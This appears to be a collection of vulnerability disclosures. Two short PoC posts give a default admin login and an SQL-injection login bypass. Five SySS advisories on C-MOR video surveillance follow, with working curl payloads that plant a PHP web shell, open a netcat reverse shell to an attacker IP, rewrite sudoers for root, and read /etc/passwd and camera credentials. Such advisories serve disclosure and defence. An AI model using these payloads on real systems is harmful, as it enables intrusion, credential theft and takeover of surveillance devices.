<pre><code>=============================================================================================================================================<br />| # Title : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user&pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/survey/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-030<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: OS Command Injection (CWE-78)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45179<br />Authors of Advisory: Matthias Deeg (SySS GmbH), Chris Beiter,<br /> Frederik Beimgraben,<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to insufficient input validation, the C-MOR web interface is<br />vulnerable to OS command injection attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functionality is vulnerable to OS command injection attacks, for<br />example for generating new X.509 certificates or setting the time zone.<br /><br />The OS command injection vulnerability in the script "generatesslreq.pml"<br />can be exploited as a low-privileged authenticated user (see <br />SYSS-2024-024[3])<br />in order to execute commands in the context of the Linux user "www-data".<br /><br />The OS command injection vulnerability in the script "settimezone.pml"<br />requires an administrative user for the C-MOR web interface.<br /><br />By also exploiting the privilege escalation vulnerability described in<br />SYSS-2024-027[4], it is possible to execute commands on the C-MOR system<br />with root privileges.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By sending the following HTTP POST request to the script<br />"generatesslreq.pml", the injected OS command via the parameter<br />"city" is executed as Linux user "www-data".<br /><br />In this sample attack vector, a simple PHP web shell is created in<br />the backup directory within the web server's webroot:<br /><br />POST /generatesslreq.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 152<br />Connection: close<br /><br />countrycode=de&state=state&city=city'|echo '<?php echo <br />system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php <br />#&organization=org&servername=syss<br /><br /><br />This PoC attack can be performed using the following curl command:<br /><br />curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo <br />system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php <br />#&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>" <br />--ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml<br /><br />The uploaded web shell can be used via the following URL:<br /><br />https://<HOST>/backup/web shell.php?cmd=<COMMAND><br /><br /><br />In version 6.00PL01, an OS command injection was, for instance, possible<br />using the following attack vector:<br /><br />curl -X POST \<br /> -d <br />'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26' <br />\<br /> --user "<USERNAME>:<PASSWORD>" \<br /> --insecure \<br /> --ciphers 'DEFAULT:!DH' \<br /> https://<HOST>/en/setdatetime.pml<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The described security vulnerability has not been fixed entirely in the <br />newly<br />released software version 6.00PL01.<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-030<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt<br />[3] SySS Security Advisory SYSS-2024-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[4] SySS Security Advisory SYSS-2024-027<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt<br />[5] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-028<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Cleartext Storage of Sensitive Information <br />(CWE-312)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45175<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Sensitive information is stored in cleartext.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR system, it was found that sensitive information,<br />for example login credentials of cameras, is stored in clear text.<br /><br />Thus, an attacker with file system access, for example exploiting a path<br />traversal attack (see SYSS-2024-025[3]), has access to the login data of<br />all configured cameras or the configured FTP server.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By exploiting the path traversal attack in the backup download script<br />"download-bkf.pml", login credentials of cameras can be retrieved, as<br />the following HTTP request and the corresponding response demonstrate:<br /><br />POST /download-bkf.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 24<br />Connection: close<br /><br />bkf=../../../etc/ip.cam1<br /><br /><br />HTTP/1.1 200 OK<br />(...)<br /><br />192.168.1.11<br />80<br /><USERNAME><br /><PASSWORD><br /><br /><br />This PoC attack can be performed using the following curl command:<br /><br />curl -X POST -d 'bkf=../../../etc/ip.cam1' --user <br />'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' <br />https://<HOST>/download-bkf.pml<br />192.168.1.11<br />80<br /><USERNAME><br /><PASSWORD><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-028<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt<br />[3] SySS Security Advisory SYSS-2024-025<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-027<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Improper Privilege Management (CWE-269)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45173<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper privilege management concerning sudo privileges, C-MOR<br />is vulnerable to a privilege escalation attack.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]),<br />it was found that the Linux user "www-data" running the C-MOR web<br />interface can execute some OS commands as root via sudo without having<br />to enter the root password.<br /><br />These commands, for example, include "cp", "chown", and "chmod", which<br />enable an attacker to modify the system's sudoer file in order to<br />execute all commands with root privileges.<br /><br />Thus, it is possible to escalate the limited privileges of the user<br />"www-data" to root privileges.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />For demonstrating a privilege escalation attack with shell access as<br />the user "www-data", the following shell script was uploaded to the<br />C-MOR system and executed:<br /><br />$ cat privesc.sh<br />sudo cp /etc/sudoers /home/cam<br />sudo chown www-data /home/cam/sudoers<br />sudo chmod 777 /home/cam/sudoers<br />echo 'www-data ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers<br />sudo chmod 440 /home/cam/sudoers<br />sudo chown root /home/cam/sudoers<br />sudo cp /home/cam/sudoers /etc/sudoers<br />sudo rm /home/cam/sudoers<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-027<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt<br />[3] SySS Security Advisory SYSS-2024-026<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-026<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Unrestricted Upload of File with Dangerous <br />Type (CWE-434)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45171<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper user input validation, it is possible to upload<br />dangerous files, for instance PHP code, to the C-MOR system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that the<br />upload functionality for backup files allows an authenticated user to<br />upload arbitrary files. The only condition is that the file name<br />contains the string ".cbkf".<br /><br />Therefore, "webshell.cbkf.php" is considered a valid file name for<br />the C-MOR web application.<br /><br />Uploaded files are stored within the directory "/srv/www/backups" on<br />the C-MOR system and can thus be accessed via the URL<br />https://<HOST>/backup/upload_<FILENAME>.<br /><br />Due to broken access control, also low-privileged authenticated users<br />can use this file upload functionality (see SYSS-2024-024[3]).<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the upload functionality for backup files, it is possible to<br />upload arbitrary PHP code, for instance a simple PHP web shell such<br />as the following one, in a file named "webshell.cbkf.php":<br /><br /><?php echo system($_GET['cmd'); ?><br /><br />After a successful file upload, the uploaded PHP web shell can be<br />accessed and used via the following URL, leading to OS command<br />execution:<br /><br />https://<HOST>/backup/upload_webshell.cbkf.php?cmd=<COMMAND><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-026<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt<br />[3] SySS Security Advisory SYSS-2024-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-025<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Relative Path Traversal (CWE-23)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45178<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper user input validation, it is possible to download<br />arbitrary files from the C-MOR system via a path traversal attack.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functionalities are vulnerable to path traversal attacks, which is<br />due to insufficient user input validation.<br /><br />For instance, the download functionality for backups provided by the<br />script "download-bkf.pml" is vulnerable to a path traversal<br />attack via the parameter "bkf".<br /><br />This enables an authenticated user to download arbitrary files as<br />Linux user "www-data" from the C-MOR system.<br /><br />Another path traversal attack is in the script "show-movies.pml",<br />which can be exploited via the parameter "cam".<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the following HTTP POST request with the relative path<br />"../../../../etc/passwd" as value for the parameter "bkf", it is<br />possible to download the file "/etc/passwd":<br /><br />POST /download-bkf.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 26<br /><br />bkf=../../../../etc/passwd<br /><br /><br />An example of a successful path traversal attack is demonstrated via<br />the following curl command:<br /><br />$ curl -X POST -d 'bkf=../../../../etc/passwd' --user <br />'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' <br />https://<HOST>/download-bkf.pml<br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />Debian-exim:x:101:103::/var/spool/exim4:/bin/false<br />statd:x:102:65534::/var/lib/nfs:/bin/false<br />sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin<br />cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash<br />postfix:x:104:107::/var/spool/postfix:/bin/false<br />stunnel4:x:105:109::/var/run/stunnel4:/bin/false<br />mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false<br />messagebus:x:107:113::/var/run/dbus:/bin/false<br />ntp:x:108:114::/home/ntp:/bin/false<br />download:x:1002:1002:Download User:/home/download:/bin/bash<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-025<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security 